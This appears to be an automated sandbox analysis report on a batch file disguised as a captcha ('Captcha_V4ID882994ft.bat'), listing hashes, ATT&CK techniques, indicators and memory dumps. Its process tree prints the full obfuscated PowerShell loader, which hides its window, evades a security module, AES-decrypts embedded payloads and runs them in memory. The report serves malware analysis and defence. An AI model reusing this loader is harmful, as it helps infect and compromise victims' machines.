5d5b4f259ef3b3d20f6ef1a63def6dee9326efe2b7b7b7e474008aa978f1f19b

General

Target

Captcha_V4ID882994ft.bat
Size

441KB
MD5

5744e74d67f4cc91f262ddb95ac245a3
SHA1

890799de73d375478d3a5f0e2b86cec6a0585a91
SHA256

e726d3324ca8b9a8da4d317c5d749dd0ad58fd447a2eb5eee75ef14824339cd5
SHA512

9e30407dce840bb0c36b440b345572ba93bf7f9d2180b98255c371b2fc5d4289a27b74a9436148ff5448beb5f4d2160958625378122bad1920856b9da7807ea3
SSDEEP

12288:tAyShKVnHj+CoqBG+OlBn/ZGkQdLDLP4yLu:tnJh+cOn+LDLP5i

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 13 IoCs

flow	pid	Process
27	1408	powershell.exe
45	1408	powershell.exe
47	1408	powershell.exe
53	1408	powershell.exe
59	1408	powershell.exe
60	1408	powershell.exe
61	1408	powershell.exe
62	1408	powershell.exe
63	1408	powershell.exe
64	1408	powershell.exe
65	1408	powershell.exe
66	1408	powershell.exe
67	1408	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4476	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1408	powershell.exe
1408	powershell.exe
4476	powershell.exe
4476	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3496 wrote to memory of 4804	3496	cmd.exe	83
PID 3496 wrote to memory of 4804	3496	cmd.exe	83
PID 3496 wrote to memory of 1408	3496	cmd.exe	84
PID 3496 wrote to memory of 1408	3496	cmd.exe	84
PID 3496 wrote to memory of 1408	3496	cmd.exe	84
PID 1408 wrote to memory of 4476	1408	powershell.exe	85
PID 1408 wrote to memory of 4476	1408	powershell.exe	85
PID 1408 wrote to memory of 4476	1408	powershell.exe	85

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Captcha_V4ID882994ft.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH', ''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd', ''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz', ''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv', ''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ', ''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rUbtz($WsNJE){$aFysz=[System.Security.Cryptography.Aes]::Create();$aFysz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aFysz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aFysz.Key=[System.Convert]::($KKOH[11])('SiNWeP/fk7RgqOL4+MYNGAilPoSRNS1a+HTyg2gC1Lk=');$aFysz.IV=[System.Convert]::($KKOH[11])('yZOGdg/vBGiLeun/JpgA4Q==');$FQbge=$aFysz.($KKOH[8])();$auohI=$FQbge.($KKOH[1])($WsNJE,0,$WsNJE.Length);$FQbge.Dispose();$aFysz.Dispose();$auohI;}function LYeXU($WsNJE){$PsBXz=New-Object System.IO.MemoryStream(,$WsNJE);$qJWpS=New-Object System.IO.MemoryStream;$KUcRl=New-Object System.IO.Compression.GZipStream($PsBXz,[IO.Compression.CompressionMode]::($KKOH[13]));$KUcRl.($KKOH[9])($qJWpS);$KUcRl.Dispose();$PsBXz.Dispose();$qJWpS.Dispose();$qJWpS.ToArray();}$cnXBi=[System.IO.File]::($KKOH[5])([Console]::Title);$gbxFr=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 5).Substring(2))));$hwaTP=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 6).Substring(2))));[System.Reflection.Assembly]::($KKOH[7])([byte[]]$hwaTP).($KKOH[4]).($KKOH[10])($null,$null);[System.Reflection.Assembly]::($KKOH[7])([byte[]]$gbxFr).($KKOH[4]).($KKOH[10])($null,$null); "
  2⤵
  PID:4804
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1408
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mqzpgiem.dmw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1408-22-0x0000000006960000-0x00000000069A4000-memory.dmp

Filesize
272KB

Download
memory/1408-25-0x00000000078F0000-0x000000000790A000-memory.dmp

Filesize
104KB

Download
memory/1408-3-0x0000000005650000-0x0000000005C78000-memory.dmp

Filesize
6.2MB

Download
memory/1408-4-0x0000000005390000-0x0000000005416000-memory.dmp

Filesize
536KB

Download
memory/1408-5-0x0000000005520000-0x0000000005542000-memory.dmp

Filesize
136KB

Download
memory/1408-6-0x00000000055C0000-0x0000000005626000-memory.dmp

Filesize
408KB

Download
memory/1408-7-0x0000000005DF0000-0x0000000005E56000-memory.dmp

Filesize
408KB

Download
memory/1408-1-0x0000000004E70000-0x0000000004EA6000-memory.dmp

Filesize
216KB

Download
memory/1408-17-0x0000000005F20000-0x0000000006274000-memory.dmp

Filesize
3.3MB

Download
memory/1408-18-0x0000000005DC0000-0x0000000005DD0000-memory.dmp

Filesize
64KB

Download
memory/1408-19-0x0000000006410000-0x0000000006514000-memory.dmp

Filesize
1.0MB

Download
memory/1408-20-0x0000000006520000-0x000000000653E000-memory.dmp

Filesize
120KB

Download
memory/1408-21-0x0000000006550000-0x000000000659C000-memory.dmp

Filesize
304KB

Download
memory/1408-0-0x0000000074C4E000-0x0000000074C4F000-memory.dmp

Filesize
4KB

Download
memory/1408-2-0x0000000074C40000-0x00000000753F0000-memory.dmp

Filesize
7.7MB

Download
memory/1408-50-0x0000000074C40000-0x00000000753F0000-memory.dmp

Filesize
7.7MB

Download
memory/1408-42-0x0000000074C4E000-0x0000000074C4F000-memory.dmp

Filesize
4KB

Download
memory/1408-48-0x0000000074C40000-0x00000000753F0000-memory.dmp

Filesize
7.7MB

Download
memory/1408-47-0x000000000AC10000-0x000000000B228000-memory.dmp

Filesize
6.1MB

Download
memory/1408-46-0x0000000007C10000-0x0000000007CCA000-memory.dmp

Filesize
744KB

Download
memory/1408-24-0x0000000007F70000-0x00000000085EA000-memory.dmp

Filesize
6.5MB

Download
memory/1408-41-0x00000000051C0000-0x00000000051CA000-memory.dmp

Filesize
40KB

Download
memory/1408-23-0x0000000007870000-0x00000000078E6000-memory.dmp

Filesize
472KB

Download
memory/1408-43-0x0000000074C40000-0x00000000753F0000-memory.dmp

Filesize
7.7MB

Download
memory/1408-44-0x0000000007AC0000-0x0000000007B16000-memory.dmp

Filesize
344KB

Download
memory/1408-45-0x0000000007B20000-0x0000000007B7C000-memory.dmp

Filesize
368KB

Download
memory/4476-33-0x0000000074C40000-0x00000000753F0000-memory.dmp

Filesize
7.7MB

Download
memory/4476-27-0x0000000074C40000-0x00000000753F0000-memory.dmp

Filesize
7.7MB

Download
memory/4476-26-0x0000000074C40000-0x00000000753F0000-memory.dmp

Filesize
7.7MB

Download
memory/4476-40-0x0000000074C40000-0x00000000753F0000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing